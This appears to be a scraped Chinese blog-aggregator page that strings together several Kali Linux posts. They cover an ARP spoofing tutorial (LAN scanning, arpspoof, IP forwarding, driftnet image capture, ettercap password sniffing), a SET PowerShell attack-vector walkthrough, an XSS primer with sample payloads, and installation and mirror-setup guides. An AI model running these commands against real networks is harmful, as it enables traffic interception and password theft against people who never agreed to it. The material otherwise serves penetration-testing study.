kali

Kali虚拟机下的arp欺骗

两盒软妹~` 提交于 2020-01-18 23:47:22
arp攻击 查看本机ip 使用指令ifconfig inet之后的便是IPV4地址 查一下和自己在同一WiFi下的其他设备 命令: fping -g -r 0 -s 192.168.31.48/24 | grep alive 进行目标IP系统探测(探测是什么系统:电脑or手机) 命令:nmap -T4 -O (目标IP) arp断网攻击 命令:arpspoof -i eth0 -t 192.168.31.140 -r 192.168.31.1 形式:arpspoof -i eth0(一般虚拟机默认为此) -t 目标IP -r 网关 arp欺骗 查本机ip -------------- ifconfig 查和自己处在同一WiFi下的IP ------------ fping -g -r 0 -s 192.168.31.48/24 | grep alive 既然是欺骗,那就不能让目标主机断网,所以要更改配置文件 命令:echo 1 > /proc/sys/net/ipv4/ip_forward cat /proc/sys/net/ipv4/ip_forward arp攻击 命令:arpspoof -i eth0 -t 192.168.31.140 -r 192.168.31.1 抓图片 driftnet -i eth0 实现密码嗅探 ettercap -Tq -i eth0 注意

Kali学习 | 权限提升:5.10 SET_PowerShell攻击向量

℡╲_俬逩灬. 提交于 2020-01-18 15:42:46
Kali学习 | 权限提升:5.10 SET_PowerShell攻击向量 PowerShell 介绍 操作步骤 PowerShell 介绍 在社会工程学中,使用基于Java的PowerShell攻击向量是非常重要的。 如果目标主机没有运行Java,则不能欺骗它访问攻击主机社会工程学的页面,将不能进行攻击。 所以需要使用另一种方法实现,就是 向目标主机发送病毒文件 。 使用PowerShell攻击向量可以创建PowerShell文件,并将创建好的文件发送给目标。 当目标运行时,就可以获取一个 远程连接 。 操作步骤 (1)启动社会工程学。执行命令如下所示: (2)选择社会工程学,输入编号1,如下所示: (3)选择PowerShell攻击向量,输入编号10。将显示如下所示的信息: (4)选择PowerShell字母代码注入,输入编号1。将显示如下所示的信息: 输出的信息显示了攻击主机的配置信息。 此时已经成功启动了攻击载荷,等待目标主机的连接。 以上设置完成后,将会在/root/.set/reports/powershell/目录下创建了一个渗透攻击代码文件。 该文件是一个文本文件,其文件名为x86powershell_injection.txt。 (5)此时再打开一个终端窗口,查看渗透攻击文件的内容,如下所示: 以上信息就是x86_powershell_injection

Kali Linux渗透测试实战 1.2 环境安装及初始化

十年热恋 提交于 2020-01-16 05:14:34
/*--> */ /*--> */ 1.2 环境安装及初始化 目录(?) [-] 环境安装及初始化 下载映像 安装虚拟机 安装Kali Linux 安装中文输入法 安装VirtualBox增强工具 配置共享目录和剪贴板 运行 Metasploit Framework 启动Kali的PostgreSQL服务 启动Kali的Metasploit服务 在Kali运行msfconsole 小结 在 1.1 节,我们大致了解了 Kali Linux 的内置工具集,本节主要介绍虚拟机下的系统安装。 如果您需要定制或者采用其他方式安装系统,请参考官方文档, http://cn.docs.kali.org/ 。官方文档内容大致如下图: KaliLinux 官方文档( 1 ) Kali Linux 官方文档( 2 ) 1.2.1 下载映像 在地址 http://www.kali.org/downloads/ ,我们可以看到网站提供 32 位和 64 位的 ISO 映像文件。 下载映像文件 根据实际情况选择你要下载的版本,我下载的是 Kali Linux 64 Bit 。 1.2.2 安装虚拟机 相对于 VMWare ,个人更喜欢 VirtualBox ,因为 VirtualBox 是开源、免费,比 VMWare 更轻量。 首先到 https://www.virtualbox.org/wiki

小白日记47:kali渗透测试之Web渗透-XSS(一)

百般思念 提交于 2020-01-15 00:49:45
XSS 【推荐书籍: XSS跨站脚本攻击剖析与防御 】 xss表示Cross Site Scripting(跨站脚本攻击) ,它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,通过插入恶意脚本,实现对用户浏览器的控制。 漏洞存在于服务器端,攻击对象为WEB客户端。 【 原理 :为了使用户体验更好等因素,有部分代码会在浏览器中执行】 【 JavaScript详解 】:与java语言无关;命名完全出于市场原因,是使用最广的客户端脚本语言 使用场景   直接嵌入html:<script>alert('XSS')</script>   元素标签事件:<body onload=alert('XSS')>   图片标签:<img src="javascript:alert('xss');">   其他标签:<iframe>,<div>,<link>    DOM 对象【 文本对象模型 】,篡改页面内容 可实现攻击方式:   1、盗取cookie【若浏览器正在登录状态】   2、重定向到特定站点【可做钓鱼也页面】 常用的客户端脚本语言 :JavaScript,VBScript,Activex,Flash XSS   攻击参与方 :攻击者,被攻击者,漏洞站点,第三方站点(攻击目标/攻击参与站)    漏洞形成根源

kali安装docker(有效详细的教程) ——vulhub漏洞复现 001

▼魔方 西西 提交于 2020-01-14 01:50:55
前记: 博主有着多次安装docker的丰富经验,曾经为了在kali成功安装docker花费不少时间。在kali2016.3一直到最新的kali2019.4都通吃!所以跟着下面的步骤走,绝对不会出错。(该机子此前没装过docker,并且配置好了kali更新源) 1、curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add - 2、echo 'deb https://download.docker.com/linux/debian stretch stable'> /etc/apt/sources.list.d/docker.list 3、apt-get install apt-transport-https ca-certificates curl gnupg2 software-properties-common 选择Y执行,等待一段时间后,要手动阅读一段信息最后按q退出即可。直到出现: Tab切换,选择yes就行了。如果出现字体乱码,别慌,切换一下字体重启就好了。 4、apt-get update 5、sudo apt install docker.io 6、检查docker安装情况: END 到这里,我想大部分kali都能够安装好docker了。我是jammny,喜欢的朋友点个赞

KALI Linux安装VMware Tools

匆匆过客 提交于 2020-01-14 01:15:11
VMware Tools是虚拟机和物理机交换数据的一个强大工具,可以让虚拟机自适应窗口大小,以及物理机和虚拟机之间的复制黏贴操作等,能够更方便我们使用虚拟机的操作系统,接下来我们就在KALI中安装VMware Tools 首先打开虚拟机,单击虚拟机选项卡下的安装 VMware Tools选项 就会看到位置选项卡下多了一个VM的光驱标志,单击它 复制下图里的这个文件到桌面 然后打开终端,进入桌面目录 用ls命令查看当前目录下的文件,看到我们刚刚复制过来的VMtools压缩包 用 tar zxvf VMwareTools-10.1.6-5214329.tar.gz(这一长串文件名可以直接在终端里复制) 这个命令解压压缩包。 进入vmware-tools-distrib文件夹,输入 ./vmware-install.pl开始安装,之后一直回车使用默认的即可 这样就可以完成VMware Tools的安装了。 注意:由于版本的不同,文件名可能不尽相同,大家自行按照实际环境进行操作即可,本文仅供参考,如有错误欢迎大家指出! 来源: https://www.cnblogs.com/ivansatan/p/10381329.html

Kali 安装 Virtualbox 增强功能

耗尽温柔 提交于 2020-01-14 00:08:11
Host 平台 Ubuntu 18.04 首先安装Virtualbox,使用:sudo apt-get install virtualbox-qt 使用Kali镜像 安装vm,要提前开启 BIOS 的 Intel Virtualization Technology,将其设置位 Enabled,否则 Virtualbox 将只能安装 32位虚拟机 安装Kali 过程中,可以不选择安装network mirror 完成后,开机登陆,安装Virtualbox 增强功能,进入路径:/media/cdrom0,运行:sh autorun.sh 即可 来源: CSDN 作者: weixin_39658178 链接: https://blog.csdn.net/weixin_39658178/article/details/103952066

Ubuntu和Debian安装metasploit-framework

余生颓废 提交于 2020-01-13 00:55:32
添加阿里云的kali源 系统的镜像源文件在apt目录下 /etc/apt/sources.list 用文本编辑器打开sources.list,手动添加如下代码 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib 将原来的源使用#号注释掉 # deb http://http.kali.org/kali kali-rolling main non-free contrib # deb-src http://http.kali.org/kali kali-rolling main non-free contrib 一般没啥问题,二班情况建议提前备份号文件,或者虚拟机快照,方便回退,减少误操作带来的损失。 更新源 apt update 更新源 apt upgrade 更新软件(一般比较大,自己酌情更新即可) apt dist-upgrade 这个是更新系统的所有程序 接下来是解决签名的问题 直接一条命令 wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add

SEC集训 Day 1;

眉间皱痕 提交于 2020-01-11 23:26:12
SEC集训今天刚刚开始,毋庸置疑,第一件头等大事就是安装相应的软件了,对于这些神奇的软件我除了迷茫已经没有任何思想,更别提什么想法。 软件下载要半天时间,没事可以等待吗,心急吃不了热豆腐。终于默默的等了半天,下载完毕,但竟然没办法用(内心已经完全茫然,不知该如何是好)。 不过还好我用了半天时间终于终于终于把派森(Python)绅士和卡里(Kali)女士完好无缺的放进了电脑里。(嘿嘿,他俩这辈子也出不来了,嘿嘿,嗝) 不过呢安装完软件当然就是没有糖吃,但是有题做呀,做题它不香吗?当然香啦!(呵呵,鬼才信) 但是 虽然一下午没干什么,但对计算机以及与它有关的一些事情有了更加深入的理解,并且进行的一些任务 1 卡里(Kali)换源; 2安装VMtools; 3卡里(Kali)更新命令更新; 4将卡里(Kali)自带的火狐(珍惜保护动物欧(浏览器))改为中文。 我认为更加深入的了解往往比知识更有用,人的眼界高了,心想要到达的地方也就远了。你的心决定你能走多远。 而这也只是刚刚开始,以后应该还要有更多的挑战,但人应该学会活着,而不是存在,活着就要吃苦(啊啊啊~~~~~~!!!)。 来源: CSDN 作者: weixin_46176940 链接: https://blog.csdn.net/weixin_46176940/article/details/103940260

kali 换源教程

泪湿孤枕 提交于 2020-01-11 23:15:42
一·寻找终端 kali的终端类似于windows的dos,可以在此界面中,对kali系统进行操纵。其位于界面左侧,第三个图标便是终端。 二·打开“sources.list “ 打开kali的终端输入命令“leafpad /etc/apt/sources.list “ 三·更改“sources.list “ 界面里所有内容全部删除,添加中科大的源。下面的就是中科大源的地址。 deb https://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src https://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 输入完成后,键入ctrl+s保存。然后关闭sources.list 。 四·依次输入spt-update, spt-upgrade(此过程较长,请耐心等待) tip:若出现“正在设定安装包”且无法确定(摁回车或点击没反应)的情况,摁tab+enter。 来源: CSDN 作者: index8283 链接: https://blog.csdn.net/index8283/article/details/103940685